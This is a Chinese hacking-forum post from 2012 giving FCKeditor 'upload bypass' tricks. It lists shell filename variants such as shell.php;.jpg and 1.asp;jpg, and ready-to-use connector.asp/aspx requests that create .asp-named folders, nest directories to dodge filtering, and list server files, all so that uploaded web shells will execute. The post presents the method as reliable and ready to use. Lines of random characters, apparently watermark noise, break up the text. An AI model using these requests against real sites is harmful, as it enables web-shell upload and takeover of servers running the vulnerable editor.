中国网络渗透测试联盟
标题:
FCK 0day FCKeditor 建立文件夹,上传文件时"."变"_"的突破
[打印本页]
作者:
admin
时间:
2012-12-31 09:27
标题:
FCK 0day FCKeditor 建立文件夹,上传文件时"."变"_"的突破
很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
4 Q0 `0 b3 b& y. Z% D
' l' U) i0 a& G1 Y0 z* d
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
' G& Z3 V/ c+ f
9 F" T5 w3 d* n7 t& G
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
T5 P) O, h5 b; M1 V6 }
# b; Q" W( c6 n! Q; Y
突破建立文件夹:
. w+ K G8 {" @
# @9 n2 k5 Z) L1 I& \7 V& o- n
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
$ Z9 e5 l, i& T9 V$ E3 ^. |/ l
) D; K7 X# E( k) Z
参数:
; I; x* H5 x. n6 t6 o5 t; q e
% d5 `; v$ Y# X. Y9 [: ]
当前目录名:CurrentFolder=/qing.asp
0 r/ ^8 h- e4 y; e+ ?* v
9 T9 T4 g5 \# x+ g* o# I+ `# Z9 m
新的目录名:NewFolderName=x.asp
# D! s J* U$ x) j- A, v+ v
0 {6 E8 v& K, ~& l7 X
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
, w( S6 R& X$ o: K% x$ S; N
, ^) g9 a/ V5 }% x& d
那么 x.asp 就已经建立生成了,此方法百试百灵!
$ V3 }9 I) C0 j4 M: g
7 I/ i7 w$ ~1 u- i+ l2 X
新建文件夹参数 x.asp,基本都能搞定。
( Y* j; _5 N& x6 s! ~: S @
( A0 [- I4 \$ E4 I( N5 a/ a2 i
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
. R' q& ~3 G3 Z4 z0 ?
6 U# J% d( W) P- c/ e4 K
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
! ?4 J( `: K* E- W1 o- T/ r |
1 a- @5 o- c [
获取文件列表
a3 }( Z8 u$ {
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
. W$ c! Y9 n1 }: t& W# u
, \& m" T! |- i% x" n
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2